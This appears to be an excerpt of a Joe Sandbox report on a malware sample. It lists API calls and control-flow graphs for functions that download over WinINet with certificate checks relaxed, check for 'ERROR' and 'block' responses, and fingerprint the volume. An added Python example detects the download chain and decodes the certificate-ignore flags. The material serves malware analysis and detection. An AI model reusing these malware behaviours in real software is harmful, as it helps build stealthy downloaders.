                          • lstrlen.KERNEL32(011968E0), ref: 00530698
                          • lstrcpy.KERNEL32(00000000,?), ref: 005306C9
                          • lstrcat.KERNEL32(00000000,?), ref: 005306D5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00530706
                          • lstrcpy.KERNEL32(00000000,011A88E0), ref: 0053074B
                            • Part of subcall function 00511530: lstrcpy.KERNEL32(00000000,?), ref: 00511557
                            • Part of subcall function 00511530: lstrcpy.KERNEL32(00000000,?), ref: 00511579
                            • Part of subcall function 00511530: lstrcpy.KERNEL32(00000000,?), ref: 0051159B
                            • Part of subcall function 00511530: lstrcpy.KERNEL32(00000000,?), ref: 005115FF
                          • lstrcpy.KERNEL32(00000000,?), ref: 0053077F
                          • lstrcpy.KERNEL32(00000000,011ADCA8), ref: 005307E7
                          • lstrcpy.KERNEL32(00000000,011A8B70), ref: 00530858
                          • lstrcpy.KERNEL32(00000000,fplugins), ref: 005308CF
                          • lstrcpy.KERNEL32(00000000,?), ref: 00530928
                          • lstrcpy.KERNEL32(00000000,011A8A20), ref: 005309F8
                            • Part of subcall function 005124E0: lstrcpy.KERNEL32(00000000,?), ref: 00512528
                            • Part of subcall function 005124E0: lstrcpy.KERNEL32(00000000,?), ref: 0051254E
                            • Part of subcall function 005124E0: lstrcpy.KERNEL32(00000000,?), ref: 00512577
                          • lstrcpy.KERNEL32(00000000,011A89F0), ref: 00530ACE
                          • lstrcpy.KERNEL32(00000000,?), ref: 00530B81
                          • lstrcpy.KERNEL32(00000000,011A89F0), ref: 00530D58
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat
                          • String ID: fplugins
                          • API String ID: 2500673778-38756186
                          • Opcode ID: 1cd87c706c6f079bd882d89beeedc3a237a9c8ff124f5ff15d360d98cddb718c
                          • Instruction ID: 30838ebe4209828ef01ec51b7aef140dba740c7665e2b5ab88168c36095ed872
                          • Opcode Fuzzy Hash: 1cd87c706c6f079bd882d89beeedc3a237a9c8ff124f5ff15d360d98cddb718c
                          • Instruction Fuzzy Hash: 1CE26C74A053418FD734DF29C488B6ABBE1BF89304F58856EE48D8B292DB31D885CF56

                           Control-flow Graph
                           • Basic blocks of the function at 516c40, sorted by address: node id, address range, calls made in the block -> successor node ids; "(exit)" marks a block with no successor in the graph
                           • 2234 516c40-516c64 call 512930 -> 2237, 2238
                           • 2238 516c66-516c6b -> 2237, 2239
                           • 2239 516c6d-516c6f lstrcpy -> 2237
                           • 2237 516c75-516c97 call 514bc0 -> 2242, 2243
                           • 2242 516c99 -> 2244
                           • 2244 516ca0-516ca8 -> 2243, 2244
                           • 2243 516caa-516cba call 512930 -> 2247, 2248
                           • 2248 516cbc-516cc2 lstrcpy -> 2247
                           • 2247 516cc8-516cf5 InternetOpenA StrCmpCA -> 2249, 2250
                           • 2249 516cf7 -> 2250
                           • 2250 516cfa-516cfc -> 2251, 2252
                           • 2251 516d02-516d22 InternetConnectA -> 2254, 2255
                           • 2255 516d28-516d5d HttpOpenRequestA -> 2256, 2257
                           • 2256 516d63-516d65 -> 2259, 2260
                           • 2259 516d67-516d77 InternetSetOptionA -> 2260
                           • 2260 516d7d-516dad HttpSendRequestA HttpQueryInfoA -> 2263, 2264
                           • 2264 516daf-516dd3 call 5371e0 call 512a20 * 2 -> (exit)
                           • 2263 516dd4-516de4 call 533d90 -> 2264, 2275
                           • 2275 516de6-516de8 -> 2277, 2278
                           • 2278 516dee-516e07 InternetReadFile -> 2277, 2280
                           • 2280 516e0d -> 2281
                           • 2281 516e10-516e15 -> 2277, 2283
                           • 2283 516e17-516e3d call 537310 -> 2286, 2287
                           • 2287 516e3f call 512a20 -> 2286
                           • 2286 516e44-516e51 call 512930 -> 2291, 2292
                           • 2292 516e53-516e57 -> 2291, 2293
                           • 2293 516e59-516e5b lstrcpy -> 2291
                           • 2291 516e61-516e8b call 512a20 InternetReadFile -> 2277, 2281
                           • 2277 516e8d-516e8e InternetCloseHandle -> 2257
                           • 2257 516e94-516e9e InternetCloseHandle -> 2254
                           • 2254 516ea1-516ea2 InternetCloseHandle -> 2252
                           • 2252 516ea8-516ebb call 512930 -> 2261, 2262
                           • 2262 516ebd-516ebf -> 2261, 2265
                           • 2265 516ec1-516ec3 lstrcpy -> 2261
                           • 2261 516ec9-516ee0 call 512a20 * 2 -> (exit)
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 00516C6F
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00516CC2
                          • InternetOpenA.WININET(0053CFEC,00000001,00000000,00000000,00000000), ref: 00516CD5
                          • StrCmpCA.SHLWAPI(?,011AE4E8), ref: 00516CED
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00516D15
                          • HttpOpenRequestA.WININET(00000000,GET,?,011ADD98,00000000,00000000,-00400100,00000000), ref: 00516D50
                          • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00516D77
                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00516D86
                          • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00516DA5
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00516DFF
                          • lstrcpy.KERNEL32(00000000,?), ref: 00516E5B
                          • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00516E7D
                          • InternetCloseHandle.WININET(00000000), ref: 00516E8E
                          • InternetCloseHandle.WININET(?), ref: 00516E98
                          • InternetCloseHandle.WININET(00000000), ref: 00516EA2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00516EC3
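                           The listing above is the complete WinINet GET loop of this function: open a session, connect, build a GET request, relax certificate checks through InternetSetOptionA, send, read the status code, then pull the body in 0x7CF-byte chunks. The following is an added example (not Joe Sandbox tooling and not code from the sample) that parses these report lines into structured calls, checks for that call order, and decodes the WinINet constants the report shows as raw hex. The input is the list above copied verbatim; the constant names and values are from wininet.h, and the flag decode assumes the logged third argument of InternetSetOptionA is the DWORD value the sample passed rather than the buffer pointer. Bits the table does not know are returned raw instead of being guessed.

```python
"""Parse the 'APIs' lines of a Joe Sandbox function listing and test them for
the WinINet GET-download chain. Added example; not Joe Sandbox tooling and not
code from the sample. Constant names and values are from wininet.h."""
import re
from dataclasses import dataclass

# Copied verbatim from the 'APIs' list for the function at 516c40 in the report.
REPORT_LINES = """\
• lstrcpy.KERNEL32(00000000,?), ref: 00516C6F
• lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00516CC2
• InternetOpenA.WININET(0053CFEC,00000001,00000000,00000000,00000000), ref: 00516CD5
• StrCmpCA.SHLWAPI(?,011AE4E8), ref: 00516CED
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00516D15
• HttpOpenRequestA.WININET(00000000,GET,?,011ADD98,00000000,00000000,-00400100,00000000), ref: 00516D50
• InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00516D77
• HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00516D86
• HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00516DA5
• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00516DFF
• lstrcpy.KERNEL32(00000000,?), ref: 00516E5B
• InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00516E7D
• InternetCloseHandle.WININET(00000000), ref: 00516E8E
• InternetCloseHandle.WININET(?), ref: 00516E98
• InternetCloseHandle.WININET(00000000), ref: 00516EA2
• lstrcpy.KERNEL32(00000000,00000000), ref: 00516EC3
"""

# One listing line: optional bullet, optional 'Part of subcall function X:' prefix,
# API.MODULE(args) and the call-site address after 'ref:'. wsprintfA lines carry no args.
LINE_RE = re.compile(
    r"^[\s\u2022*-]*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[\w?@]+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int  # call-site address as logged by the sandbox


def parse_arg(tok):
    """Hex operands become ints (the report prints negative DWORDs with a leading
    '-'), '?' is an unresolved value (None), anything else is an inline string."""
    tok = tok.strip()
    if tok == "?":
        return None
    m = re.fullmatch(r"(-?)([0-9A-Fa-f]{1,8})", tok)
    if not m:
        return tok
    value = int(m.group(2), 16)
    return (-value) & 0xFFFFFFFF if m.group(1) else value


def parse_api_lines(text):
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
        calls.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16)))
    return calls


# Call order that makes up a plain WinINet GET download loop.
WININET_GET_CHAIN = ("InternetOpenA", "InternetConnectA", "HttpOpenRequestA",
                     "HttpSendRequestA", "HttpQueryInfoA", "InternetReadFile")
INTERNET_OPTION_SECURITY_FLAGS = 0x1F  # dwOption of InternetSetOptionA
HTTP_QUERY_STATUS_CODE = 0x13          # dwInfoLevel of HttpQueryInfoA
SECURITY_FLAGS = {                     # wininet.h; bits not listed are reported raw
    0x00000080: "SECURITY_FLAG_IGNORE_REVOCATION",
    0x00000100: "SECURITY_FLAG_IGNORE_UNKNOWN_CA",
    0x00000200: "SECURITY_FLAG_IGNORE_WRONG_USAGE",
    0x00001000: "SECURITY_FLAG_IGNORE_CERT_CN_INVALID",
    0x00002000: "SECURITY_FLAG_IGNORE_CERT_DATE_INVALID",
}


def matches_in_order(calls, chain):
    """True if every API in chain occurs in calls in that order (gaps allowed)."""
    seen = iter(c.api for c in calls)
    return all(api in seen for api in chain)


def decode_flags(value, table):
    names = [name for bit, name in sorted(table.items()) if value & bit]
    rest = value & ~sum(bit for bit in table if value & bit)
    return names, rest


def summarize(calls):
    """Behavioural summary a detection rule could key on."""
    out = {"wininet_get_chain": matches_in_order(calls, WININET_GET_CHAIN),
           "ignored_cert_errors": [], "unknown_security_bits": 0,
           "queries_status_code": False, "read_chunk_sizes": set()}
    for c in calls:
        if c.api == "InternetSetOptionA" and len(c.args) == 4 and c.args[1] == INTERNET_OPTION_SECURITY_FLAGS:
            # Assumes the logged third argument is the DWORD value, not the buffer pointer.
            names, rest = decode_flags(c.args[2], SECURITY_FLAGS)
            out["ignored_cert_errors"] += names
            out["unknown_security_bits"] |= rest
        elif c.api == "HttpQueryInfoA" and len(c.args) > 1 and c.args[1] == HTTP_QUERY_STATUS_CODE:
            out["queries_status_code"] = True
        elif c.api == "InternetReadFile" and len(c.args) > 2:
            out["read_chunk_sizes"].add(c.args[2])
    return out
```

On the lines above, summarize() reports the full chain, a 0x7CF-byte read size, a status-code query, and an InternetSetOptionA value of 0x00010300 that decodes to SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_WRONG_USAGE with 0x10000 left over; the subsequence check deliberately tolerates the lstrcpy and StrCmpCA calls between the WinINet calls, since string handling interleaved with the download is exactly what this listing shows.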
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                          • String ID: ERROR$GET
                          • API String ID: 3687753495-3591763792
                          • Opcode ID: 84fc397a350302d3f22ad66b4208483340187c2c0e1adcff5cb74004122fee3a
                          • Instruction ID: 2bf411612e31e26a60ae916e5ce5cac2449530aaa8d8954b6d335e06bd6a1791
                          • Opcode Fuzzy Hash: 84fc397a350302d3f22ad66b4208483340187c2c0e1adcff5cb74004122fee3a
                          • Instruction Fuzzy Hash: 8C81A175A4121AABEB20DFA4DC49FEF7BB9BF44700F044159FA05E7280DB74AD848B94
                          APIs
                          • lstrlen.KERNEL32(01196900), ref: 0052F315
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052F3A3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052F3C7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052F47B
                          • lstrcpy.KERNEL32(00000000,01196900), ref: 0052F4BB
                          • lstrcpy.KERNEL32(00000000,011A8880), ref: 0052F4EA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052F59E
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0052F61C
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052F64C
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052F69A
                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 0052F718
                          • lstrlen.KERNEL32(011A88D0), ref: 0052F746
                          • lstrcpy.KERNEL32(00000000,011A88D0), ref: 0052F771
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052F793
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052F7E4
                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 0052FA32
                          • lstrlen.KERNEL32(011A8930), ref: 0052FA60
                          • lstrcpy.KERNEL32(00000000,011A8930), ref: 0052FA8B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052FAAD
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052FAFE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID: ERROR
                          • API String ID: 367037083-2861137601
                          • Opcode ID: 454ee51c981d8502a550357fe55a041ef653b0c8f5211ae12d33e70b33dd5b99
                          • Instruction ID: 3984892dcbd5b41017f26eedb280e3c72219a980151e2538a5a44c0e74905ca5
                          • Opcode Fuzzy Hash: 454ee51c981d8502a550357fe55a041ef653b0c8f5211ae12d33e70b33dd5b99
                          • Instruction Fuzzy Hash: 0CF14A34A01216CFDB24DF69F848A6ABBF5BF46314B18C0BED8099B2A1D735DC42CB54

                           Control-flow Graph
                           • Basic blocks of the function at 528ca0, sorted by address: node id, address range, calls made in the block -> successor node ids; "(exit)" marks a block with no successor in the graph
                           • 2721 528ca0-528cc4 StrCmpCA -> 2722, 2723
                           • 2722 528cc6-528cc7 ExitProcess -> (exit)
                           • 2723 528ccd-528ce6 -> 2725, 2726
                           • 2726 528cec-528cf1 -> 2727
                           • 2770 528cf3 -> 2727
                           • 2727 528cf6-528cf9 -> 2729, 2730
                           • 2730 528cff -> 2732, 2733, 2734, 2735, 2736, 2737, 2738, 2739, 2740, 2741, 2742, 2743, 2744
                           • 2740 528d06-528d15 lstrlen -> 2749, 2750
                           • 2749 528d17-528d1c call 512a20 -> 2750
                           • 2750 528d1f-528d2b call 512930 -> 2779
                           • 2732 528d30-528d3f lstrlen -> 2755, 2756
                           • 2755 528d41-528d46 call 512a20 -> 2756
                           • 2756 528d49-528d55 call 512930 -> 2779
                           • 2734 528d5a-528d69 lstrlen -> 2757, 2758
                           • 2758 528d6b-528d70 call 512a20 -> 2757
                           • 2757 528d73-528d7f call 512930 -> 2779
                           • 2741 528d84-528d92 StrCmpCA -> 2729, 2760
                           • 2760 528d98-528d9f -> 2729
                           • 2742 528da4-528db8 StrCmpCA -> 2729
                           • 2735 528dbd-528dcb StrCmpCA -> 2729, 2761
                           • 2761 528dd1-528dd8 -> 2729
                           • 2736 528ddd-528deb StrCmpCA -> 2729, 2745
                           • 2745 528df1-528df8 -> 2729
                           • 2737 528dfd-528e0b StrCmpCA -> 2729, 2746
                           • 2746 528e11-528e18 -> 2729
                           • 2738 528e1d-528e2b StrCmpCA -> 2729, 2747
                           • 2747 528e31-528e38 -> 2729
                           • 2739 528e3d-528e4b StrCmpCA -> 2729, 2748
                           • 2748 528e4d-528e54 -> 2729
                           • 2733 528e56-528e64 StrCmpCA -> 2729, 2751
                           • 2751 528e66-528e6d -> 2729
                           • 2744 528e6f-528e7d StrCmpCA -> 2729, 2752
                           • 2752 528e7f-528e86 -> 2729
                           • 2743 528e88-528e9a lstrlen -> 2753, 2754
                           • 2754 528e9c-528ea1 call 512a20 -> 2753
                           • 2753 528ea4-528eb0 call 512930 -> 2779
                           • 2779 528eb3-528eb5 -> 2729, 2780
                           • 2780 528eb7-528eb9 -> 2729, 2781
                           • 2781 528ebb-528ebd lstrcpy -> 2729
                           • 2729 528ec3-528edc -> 2725, 2770
                           • 2725 528ee2-528eef call 512a20 -> (exit)
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: 884d65b62789370f5ecaf17ea8eb0fb220085e864a840498f06e00742fedaf0f
                          • Instruction ID: d0995087035541404684ffecae6f4e389c49dcc6be416a38ef4197f2d5fc276b
                          • Opcode Fuzzy Hash: 884d65b62789370f5ecaf17ea8eb0fb220085e864a840498f06e00742fedaf0f
                          • Instruction Fuzzy Hash: 06518B31A057169BD7209FB5EC88A7B7FF8BF46704B144C2EE542D3690DB78E8818B25

                           Control-flow Graph
                           • Basic blocks of the function at 532740, sorted by address: node id, address range, calls made in the block -> successor node ids; "(exit)" marks a block with no successor in the graph
                           • 2782 532740-532783 GetWindowsDirectoryA -> 2783, 2784
                           • 2783 532785 -> 2784
                           • 2784 53278c-5327ea GetVolumeInformationA -> 2785
                           • 2785 5327ec-5327f2 -> 2786, 2787
                           • 2786 5327f4-532807 -> 2785
                           • 2787 532809-532820 GetProcessHeap RtlAllocateHeap -> 2788, 2789
                           • 2788 532822-532824 -> 2790
                           • 2789 532826-532844 wsprintfA -> 2790
                           • 2790 53285b-532872 call 5371e0 -> (exit)
                          APIs
                          • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 0053277B
                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,005293B6,00000000,00000000,00000000,00000000), ref: 005327AC
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0053280F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00532816
                          • wsprintfA.USER32 ref: 0053283B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                          • String ID: :\$C
                          • API String ID: 2572753744-3309953409
                          • Opcode ID: c20a842347b8c6c5147c9b39a551770c8e5cdd830f8e02518c4e85cbbc5de8f5
                          • Instruction ID: ef6d325b54a2787ce642e88c6d84906f3b8074921d7af5553ce8d8e41087ad94
                          • Opcode Fuzzy Hash: c20a842347b8c6c5147c9b39a551770c8e5cdd830f8e02518c4e85cbbc5de8f5
                          • Instruction Fuzzy Hash: 4A316DB1D08209ABCB14CFB889859EFFFBCFF59710F10416AE505E7650E3349A408BA6

                           Control-flow Graph
                           • Basic blocks of the function at 514bc0, sorted by address: node id, address range, calls made in the block -> successor node ids; "(exit)" marks a block with no successor in the graph
                           • 2793 514bc0-514bce -> 2794
                           • 2794 514bd0-514bd5 -> 2794, 2795
                           • 2795 514bd7-514c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call 512a20 -> (exit)
                          APIs
                          • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 00514BF7
                          • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00514C01
                          • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00514C0B
                          • lstrlen.KERNEL32(?,00000000,?), ref: 00514C1F
                          • InternetCrackUrlA.WININET(?,00000000), ref: 00514C27
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ??2@$CrackInternetlstrlen
                          • String ID: <
                          • API String ID: 1683549937-4251816714
                          • Opcode ID: 61c0ee92fd861e44cbfe8b0695845a4143510a1a45c3dfa18194a885ded27da8
